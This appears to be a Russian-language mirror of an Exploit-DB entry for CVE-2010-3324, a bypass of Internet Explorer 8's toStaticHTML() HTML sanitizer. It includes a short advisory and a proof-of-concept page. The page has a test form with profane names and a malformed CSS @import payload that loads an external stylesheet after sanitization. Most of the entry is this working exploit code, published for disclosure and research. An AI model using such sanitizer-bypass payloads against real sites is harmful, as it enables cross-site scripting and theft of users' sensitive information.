- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34478
- Проверка EDB
-
- Пройдено
- Автор
- MARIO HEIDERICH
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2010-3324
- Дата публикации
- 2010-08-16
Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass
HTML:
source: https://www.securityfocus.com/bid/42467/info
Internet Explorer 8 is prone to a security-bypass weakness.
Internet Explorer 8 includes a method designed to sanitize executable script constructs from HTML. Attackers can bypass this protection, allowing script code to execute on the client, for example in a 'postMessage' call.
Attackers can leverage this issue to obtain sensitive information or potentially launch cross-site scripting attacks on unsuspecting users of targeted sites. Other attacks may also be possible.
<script type="text/javascript">
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);
ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
</script>
<form name="shit">
<textarea name='input' cols=40 rows=20>
</textarea>
<textarea name='output' cols=40 rows=20>
</textarea>
<input type=button value="fuck_me" name="fuck" onclick=fuckie();>
</form>
<style>
} () import <%7D () import> url('//127.0.0.1/1.css');aaa
{;}
</style>
<div id="x">Fuck Ie</div>- Источник
- www.exploit-db.com
